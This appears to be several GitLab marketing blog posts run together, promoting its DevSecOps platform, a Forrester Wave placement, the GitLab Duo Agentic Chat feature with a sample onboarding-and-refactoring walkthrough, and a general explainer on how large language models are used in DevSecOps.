• Build automation and CI: Forrester cited our build automation and CI with multistage build pipelines and strong self-hosted support.

Read the report

For us, being named a Leader in The Forrester Wave™: DevOps Platforms, Q2 2025 speaks to the breadth and depth of our platform’s capabilities, providing a single source of truth for the entire software development lifecycle. No more juggling multiple tools and integrations – GitLab provides a seamless, integrated experience that boosts productivity and reduces friction. We believe this placement reflects the hard work of our team, the many contributions from GitLab’s open source community, the invaluable feedback from our customers, and our dedication to shaping the future of software development.

Access the report today!

Forrester does not endorse any company, product, brand, or service included in its research publications and does not advise any person to select the products or services of any company or brand based on the ratings included in such publications. Information is based on the best available resources. Opinions reflect judgment at the time and are subject to change. For more information, read about Forrester’s objectivity here.

<center><i>How complex it can be to integrate multiple tools into a DevSecOps process</i></center>

<br></br>

The good news is that a solution exists: A comprehensive DevSecOps platform offering a unified approach to software development.

These platforms are built for organizations operating in cloud-based and DevSecOps environments, consolidating all software development stages — from code management, CI/CD processes, task management, and security to AI-driven automation — into a single platform. Centralizing all software development workflows in a unified interface enables development and operations teams to work more efficiently, streamline communication, and minimize operational complexities and disruptions.

Furthermore, the developer experience significantly improves — engineers are much happier working with a product designed specifically for modern development needs.

In the sections below, we’ll explore how GitLab helps teams overcome common challenges — whether it’s managing projects and tasks, ensuring security and compliance, or adopting AI-powered development tools – all within a single, unified platform.

Integrated Agile project management

GitLab provides a holistic solution in which project and task management are fully integrated across all stages of the software development lifecycle, such as CI/CD, enabling real-time tracking of development progress. Issues and epics directly link to automation processes, allowing a seamless flow from planning to production deployment. This approach enhances transparency across teams, reduces delays, and ensures that all stakeholders have a clear view of the development status in real-time.

Built-in security

GitLab strongly emphasizes integrating security capabilities end-to-end (security first). The platform integrates a wide range of automated security scanners, including:

• Dependency Scanning
• Static Application Security Testing (SAST)
• Dynamic Application Security Testing (DAST)
• Secret Detection
• Container Scanning

<center><i>Security scanning capabilities integrated into the CI/CD process at various development stages</i></center>

<br></br>

These security checks are built directly into every phase of the software development lifecycle, including the CI/CD pipeline, to provide developers with immediate feedback on potential security issues early in the development cycle.

Compliance and regulatory requirements

Beyond efficiency and user experience, many organizations — especially those in regulated industries such as financial institutions or large enterprises — must ensure their processes comply with strict security and compliance standards. They need the ability to enforce policies for different projects, such as mandating a security scanner every time a CI/CD pipeline runs on specific code branches (e.g., main or protected branches) or requiring specific approvals before merging code into the main branch.

With GitLab, this becomes easier through Compliance Frameworks, a feature that allows organizations to define and enforce structured policies for selected projects. This ensures compliance with automatic regulatory and security requirements while maintaining a seamless and efficient developer workflow.

AI-powered development

GitLab Duo provides AI-driven assistance across all development stages, eliminating the need to switch to external tools. Every AI-powered request is processed within the full context of the project and codebase, enabling smarter and more efficient work.

AI can perform example tasks such as:

• automatic task description generation
• smart summarization of issue discussions, saving developers valuable time
• advanced code review capabilities
• code improvement and optimization suggestions
• automated test generation
• security vulnerability detection and remediation
• troubleshooting root cause analysis for CI pipeline failures
• privacy and Data Security

Understanding the needs of regulated organizations, particularly in the public and financial sectors, GitLab offers a unique solution for running AI models in a secure environment. GitLab Duo Self-Hosted enables organizations to maintain full control over data privacy, security, and the deployment of large language models (LLMs) in their own infrastructure, ensuring:

• data privacy protection
• compliance with regulatory requirements
• maximum security
• AI benefits without external network dependencies or risks

Summary

Organizations need a comprehensive DevSecOps platform to streamline processes, enhance security, and accelerate innovation. GitLab delivers precisely that — a single application consolidating all essential development, security, and operational tools with built-in security integration and AI-powered automation.

Ready to see GitLab in action? Explore interactive demos of:

• GitLab Premium and Ultimate with Duo – experience AI-powered development assistance

• Adding security to the CI/CD pipeline – see how integrated security scanning protects your software

• Compliance frameworks – discover how GitLab enforces policies across projects for better governance

Join the GitLab 18 virtual launch event to learn about the future of the DevSecOps platform, including the role of agentic AI. Register today!

Meet the next generation of GitLab Duo Chat – GitLab Duo Agentic Chat, a significant evolution in AI-native development assistance and the newest addition to our platform, now in experimental release. GitLab Duo Agentic Chat is currently available as an experimental feature in VS Code to all users on GitLab.com that have any one of these add-ons: Duo Core, Duo Pro, or Duo Enterprise.

Agentic Chat transforms chat from traditional conversational AI to a chat experience that takes action on your behalf, breaking down complex problems into discrete tasks that it can complete. Instead of simply responding to questions with the context you provide, Agentic Chat can:

• Autonomously determine what information it needs to answer your questions
• Execute a sequence of operations to gather that information from multiple sources
• Formulate comprehensive responses by combining insights from across your project
• Create and modify files to help you implement solutions

And all of this is done while keeping the human developer within the loop.

Agentic Chat is built on the Duo Workflow architecture, which is currently in private beta. The architecture comprises agents and tools that take on specific tasks like finding the right context for a given question or editing files.

Use cases for GitLab Duo Agentic Chat

Here are some real-world and common use cases for Agentic Chat:

• Onboard to new projects faster by having AI help you familiarize yourself with a new codebase.

• Jump into assigned work immediately, even when issue descriptions are unclear, because Agentic Chat can help you connect the dots between requirements and existing implementations.

• When it's time to make changes, Agentic Chat can handle the implementation work by creating and editing multiple files across your project.

• At release time, Agentic Chat can help you verify that your solution actually addresses the original requirements by analyzing your merge requests against the initial issue or task.

<center><i>Agentic Chat making code edits</i></center>

From learning to shipping: A complete workflow demonstration in four steps

To show how Agentic Chat transforms the development experience, let's walk through a real scenario from our engineering teams. Imagine you're a new team member who's been assigned an issue but knows nothing about the codebase. You can follow along with this video demonstration:

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/uG9-QLAJrrg?si=kaOhYylMIaWkIuG8j" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

Step 1: Understand the project

Instead of manually exploring files and documentation, you can prompt Agentic Chat:

I am new to this project. Could you read the project structure and explain it to me?

Agentic Chat provides a comprehensive project overview by:

• Exploring the directory structure
• Reading README files and documentation
• Identifying key components and applications

Step 2: Understand your assigned task

Next, you need to understand your specific assignment, so you can enter this prompt:

I have been assigned Issue 1119. Could you help me understand this task, specifically where do I need to apply the refactoring?

Agentic Chat explains the task and proposes a refactoring approach by:

• Retrieving and analyzing the issue details from the remote GitLab server
• Examining relevant project files
• Identifying the specific locations requiring changes

Step 3: Implement the solution

Rather than doing the work manually, you can request:

Could you make the edits for me? Please start with steps one, two, three.

Agentic Chat then:

• Creates new directories and files as needed
• Extracts and refactors code across multiple locations
• Ensures consistency across all modified files
• Provides a summary of all changes made

Step 4: Verify completion

Finally, after creating your merge request, you can verify your work:

Does my MR fully address Issue 1119? 

Agentic Chat confirms whether all requirements have been met by analyzing both your merge request and the original issue.

Try it today and share your feedback

GitLab Duo Agentic Chat is currently available as an experimental feature in VS Code to all users on GitLab.com that have any one of these add-ons: Duo Core, Duo Pro, or Duo Enterprise. See our setup documentation for prerequisites and configuration steps.

As an experimental feature, Agentic Chat has some known limitations we're actively addressing, including slower response times due to multiple API calls, keyword-based rather than semantic search, and limited support for new local folders or non-GitLab projects. Your feedback is crucial in helping us prioritize improvements and bring Agentic Chat to general availability so please share your experience in this issue.

What's next?

We are fully focused on improving Agentic Chat, including bringing it to general availability. In the meantime, we are aiming to improve response times and are adding capabilities that GitLab Duo Chat currently has, such as using self-hosted models or supporting JetBrains and Visual Studio in addition to VS Code. Once we have switched Duo Chat to this new architecture we plan to also bring Agentic Chat to the chat in the GitLab web application. We also plan to add a lot more functionality, such as editing GitLab artifacts, supporting context from custom Model Context Protocol, or MCP, servers, and offering commands to run in the terminal.

Ready to experience autonomous development assistance but not yet a GitLab customer? Try Agentic Chat today as part of a free, 60-day trial of GitLab Ultimate with Duo Enterprise and help shape the future of AI-powered development. Follow these setup steps for VS Code.

And make sure to join the GitLab 18 virtual launch event to learn about our agentic AI plans and more. Register today!

Disclaimer: This blog contains information related to upcoming products, features, and functionality. It is important to note that the information in this blog post is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this blog and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab.

Learn more

• GitLab Duo Workflow: Enterprise visibility and control for agentic AI
• What is agentic AI?
• Agentic AI guides and resources

In this article, you will learn how LLMs work, their practical applications, and the main challenges to overcome in order to fully harness their potential.

What is an LLM?

LLMs are artificial intelligence (AI) systems that can process and generate text autonomously. They are trained by analyzing vast amounts of data from a variety of sources, enabling them to master the linguistic structures, contextual relationships, and nuances of language.

LLMs are a major breakthrough in the field of AI. Their ability to process, generate, and interpret text relies on sophisticated machine learning and natural language processing (NLP) techniques. These systems do not just process individual words; they analyze complex sequences to capture the overall meaning, subtle contexts, and linguistic nuances.

How do LLMs work?

To better understand how they work, let's explore some of the key features of large language models.

Supervised and unsupervised learning

LLMs are trained using two complementary approaches: supervised learning and unsupervised learning. These two approaches to machine learning maximize their ability to analyze and generate text.

• Supervised learning relies on labeled data, where each input is associated with an expected output. The model learns to associate these inputs with the correct outputs by adjusting its internal parameters to reduce prediction errors. Through this approach, the model acquires precise knowledge about specific tasks, such as text classification or named entity recognition.

• Unsupervised learning (or machine learning), on the other hand, does not require labeled data. The model explores large volumes of text to discover hidden structures and identify semantic relationships. The model is therefore able to learn recurring patterns, implicit grammatical rules in the text, and contextualization of sentences and concepts. This method allows LLMs to be trained on large corpora of data, greatly accelerating their progress without direct human action.

By combining these two approaches, large language models gain the advantages of both precise, human-guided learning and unlimited autonomous exploration. This complementarity allows them to develop rapidly, while continuously improving their ability to understand and generate text coherently and contextually.

Learning based on a large volume of data

LLMs are trained on billions of sentences from a variety of sources, such as news articles, online forums, technical documentation, scientific studies, and more. This variety of sources allows them to acquire a broad and nuanced understanding of natural language, ranging from everyday expressions to specialized terminology.

The richness of the data used is a key factor in LLMs' performance. Each source brings different writing styles, cultural contexts, and levels of technicality.

For example:

• News articles to master informative and factual language
• Online forums to understand specialized communities' informal conversations and technical language
• Technical documentation and scientific studies to assimilate complex concepts and specific terminology, particularly in areas such as DevOps and DevSecOps

This diversity of content allows LLMs to recognize complex linguistic structures, interpret sentences in different contexts, and adapt to highly technical domains. In DevSecOps, this means understanding commands, configurations, security protocols, and even concepts related to the development and maintenance of computer systems.

With this large-scale training, LLMs can accurately answer complex questions, write technical documentation, or identify vulnerabilities in computer systems.

Neural network architecture and "deep learning"

LLMs are based on advanced neural network architectures. These networks are specially designed to process large sequences of text while maintaining an accurate understanding of the context. This deep learning-based training is a major asset in the field of NLP.

The best-known of these structures is the architecture of sequence-to-sequence models (transformers). This architecture has revolutionized NLP with its ability to simultaneously analyze all parts of a text, unlike sequential approaches that process words one by one.

Sequence-to-sequence models excel at processing long texts. For example, in a conversation or a detailed technical document, they are able to link distant information in the text to produce precise and well-reasoned answers. This context management is essential in a DevSecOps approach, where instructions can be complex and spread over multiple lines of code or configuration steps.

Predictive text generation

When the user submits a text, query, or question, an LLM uses its predictive ability to generate the most likely sequence, based on the context provided.

The model analyzes each word, studies grammatical and semantic relationships, and then selects the most suitable terms to produce a coherent and informative text. This approach makes it possible to generate precise, detailed responses adapted to the expected tone.

In DevSecOps environments, this capability becomes particularly useful for:

• Coding assistance: generation of code blocks or scripts adapted to specific configurations
• Technical problem solving: proposing solutions based on descriptions of bugs or errors
• Drafting technical documentation: automatic creation of guides, manuals, or instructions

Predictive text generation thus makes it possible to automate many repetitive tasks and speed up technical teams' work.

Applications of large language models in a DevSecOps approach

With the rise of automation, LLMs have become indispensable allies for technical teams. Their ability to understand and generate text contextually enables them to effectively operate in complex environments such as DevSecOps.

With their analytical power and ability to adapt to specific needs, these models offer tailored solutions to streamline processes and lighten technical teams' workload.

Development teams can leverage LLMs to automatically transform functional specifications into source code.

With this capability, they can perform the following actions:

• generate complex automation scripts
• create CI/CD pipelines tailored to specific business processes
• produce customized security patches
• generate code explanation and create documentation
• refactor code by improving code structure and readability without changing functionality
• generate tests

By relying on LLMs, teams are able to accelerate the development of their software while reducing the risk of human error.

Improved documentation and knowledge sharing

These powerful tools make it easy to create customized user manuals, API descriptions, and tutorials that are perfectly tailored to each user's level of expertise. By leveraging existing knowledge bases, LLMs create contextual answers to frequently asked questions. This enhances knowledge sharing within teams, speeds up onboarding of new members, and helps centralize best practices.

Incident management and troubleshooting

During an incident, LLMs play a crucial role in analyzing logs and trace files in real time. Thanks to their ability to cross-reference information from multiple sources, they identify anomalies and propose solutions based on similar past incidents. This approach significantly reduces diagnosis time. In addition, LLMs can automate the creation of detailed incident reports and recommend specific corrective actions.

Creating and improving CI/CD pipelines

LLMs are revolutionizing the configuration of CI/CD pipelines. They can not only help create pipelines, but also automate this process and suggest optimal configurations based on industry standards. By adapting workflows to your specific needs, they ensure perfect consistency between different development environments. Automated testing is enhanced by relevant suggestions, limiting the risk of failure. LLMs also continuously monitor the efficiency of pipelines and adjust processes to ensure smooth and uninterrupted rollout.

Security and compliance

In a DevSecOps environment, large language models become valuable allies for security and compliance. They parse the source code for potential vulnerabilities and generate detailed patch recommendations. LLMs can also monitor the application of security standards in real time, produce comprehensive compliance reports, and automate the application of security patches as soon as a vulnerability is identified. This automation enhances overall security and ensures consistent compliance with legal and industry requirements.

What are the benefits of large language models?

LLMs are radically reshaping DevOps and DevSecOps approaches, bringing substantial improvements in productivity, security, and software quality. By integrating with existing workflows, LLMs are disrupting traditional approaches by automating complex tasks and providing innovative solutions.

Improved productivity and efficiency

LLMs play a central role in improving technical teams' productivity and efficiency. By automating a wide range of repetitive tasks, they free development teams from routine operations, allowing them to focus on strategic activities with higher added value.

In addition, LLMs act as intelligent technical assistants capable of instantly providing relevant code snippets, tailored to the specific context of each project. In this way, they significantly reduce research time by offering ready-to-use solutions to assist teams in their work. This targeted assistance speeds up problem solving and reduces disruptions in workflows. As a result, productivity increases and projects move forward more quickly. Technical teams can take on more tasks without compromising the quality of deliverables.

Improved code quality and security

The use of large language models in software development is a major lever for improving both code quality and application security. With their advanced analytical capabilities, LLMs can scan source code line by line and instantly detect syntax errors, logical inconsistencies, and potential vulnerabilities. Their ability to recognize defective code allows them to recommend appropriate fixes that comply with industry best practices.

LLMs also play a key preventive role. They excel at identifying complex security flaws that are often difficult for humans to detect. By analyzing dependencies, they can flag obsolete or vulnerable libraries and recommend more secure, up-to-date versions. This approach contributes to maintaining a secure environment that complies with current security standards.

Beyond fixing existing errors, LLMs offer improvements by suggesting optimized coding practices and project structures. They can generate code that meets the most advanced security standards from the earliest stages of development.

Accelerating development lifecycles

Large language models play a key role in accelerating software development lifecycles by automating key tasks that would otherwise tie up valuable human resources. Complex and repetitive tasks, such as writing functions, creating unit tests, or implementing standard components, are automated in a matter of moments.

LLMs also speed up the validation phase with their ability to suggest complete and appropriate test cases. They ensure broader test coverage in less time, reducing the risk of errors and enabling early detection of anomalies. This preventive approach shortens the correction cycle and limits delays related to code quality issues.

By simplifying technical tasks and providing fast and tailored solutions, large language models enable businesses to respond to market demands in a more agile way. This acceleration of the development lifecycle results in more frequent updates, faster iterations, and a better ability to adapt products to users' changing needs.

Development lifecycles are becoming shorter, providing a critical strategic advantage in an increasingly demanding technology landscape.

What are the challenges of using LLMs?

Despite their many benefits, large language models have certain limitations that require careful management. Their effectiveness depends heavily on the quality of the data used during their training and regular updates to their knowledge bases. In addition, issues related to algorithmic bias, data security, and privacy can arise, exposing companies to operational and legal risks. Rigorous human oversight remains essential in order to ensure the reliability of results, maintain regulatory compliance, and prevent critical errors.

Data privacy and security

Training LLMs relies on large volumes of data, often from diverse sources, raising questions about the protection of confidential information. Sensitive data shared with cloud platforms can therefore be exposed to potential breaches. This is of particular concern to companies operating in regulated sectors.

In Europe, where strict regulations like GDPR govern data management, many companies are reluctant to transfer their information to external services. Regulatory requirements, coupled with the fear of unauthorized exploitation of sensitive data, have led some companies to opt for self-hosted solutions to maintain complete control over their systems.

Providers like GitLab have put in place robust security guarantees, such as intentional non-retention of personal data and end-to-end encryption. However, this may not be enough for the most demanding customers, who prefer complete control of their environments. Implementing hybrid or on-premises solutions then becomes a strategic necessity to meet the security requirements of certain companies.

Learn more about GitLab Duo Self-Hosted by clicking on the image below to access our product tour.

Accuracy and reliability

Although large language models are capable of producing impressive results, their performance is not infallible. They can produce incorrect, incomplete, or inconsistent answers. This inaccuracy becomes particularly problematic in the context of critical tasks such as generating security code or analyzing sensitive data.

In addition, LLMs operate on the basis of probabilistic models, which means that they do not truly "understand" the content they process, but produce predictions based on statistical probabilities. This can lead to technically incorrect or even dangerous recommendations when used without human validation.

To avoid these pitfalls, it is essential to maintain constant oversight and establish rigorous validation processes. The results provided by LLMs must always be reviewed by humans before being integrated into critical systems.

A strategy of regular model updates, combined with proactive human oversight, can reduce errors and gradually improve the reliability of results.

How GitLab uses LLMs for GitLab Duo features

GitLab Duo harnesses the power of large language models to transform DevSecOps processes by integrating AI-powered capabilities throughout the software development lifecycle. This approach aims to improve productivity, strengthen security, and automate complex tasks so that development teams can focus on high added-value tasks.

AI-assisted software development

GitLab Duo provides continuous support throughout the software development lifecycle with real-time recommendations. Development teams can automatically generate unit tests, get detailed explanations of complex code segments, and benefit from suggestions to improve the quality of their code.

Proactive CI/CD failure analysis

One of the key features of GitLab Duo is its assistance in analyzing CI/CD job failures. With LLM and AI, teams are able to quickly identify sources of errors in their continuous integration and deployment pipelines.

Enhanced code security

GitLab Duo incorporates AI-based security features. The system detects vulnerabilities in the source code and proposes detailed patches to reduce the risks. Teams receive clear explanations of the nature of the vulnerabilities identified and can apply automated patches via merge requests generated directly by GitLab Duo. This feature helps secure development without slowing down development lifecycles.

Learn more about GitLab Duo Vulnerability Explanation and Resolution by clicking on the image below to access our product tour.

Key features of GitLab Duo

• GitLab Duo Chat: This conversational feature processes and generates text and code intuitively. It allows users to quickly search for relevant information in large volumes of text, including in tickets, epics, source code, and GitLab documentation.

• GitLab Duo Self-Hosted: GitLab Duo Self-Hosted allows companies with strict data privacy requirements to benefit from GitLab Duo's AI capabilities with flexibility in choosing deployment and LLMs from a list of supported options.

• GitLab Duo Code Suggestions: Development teams benefit from automated code suggestions, allowing them to write secure code faster. Repetitive and routine coding tasks are automated, significantly speeding up software development lifecycles.

GitLab Duo is not limited to these features. It offers a wide range of features designed to simplify and optimize software development. Whether it's automating testing, improving collaboration between teams, or strengthening project security, GitLab Duo is a complete solution for smart and efficient DevSecOps processes.

Learn more about GitLab Duo Enterprise by clicking on the image below to access our product tour.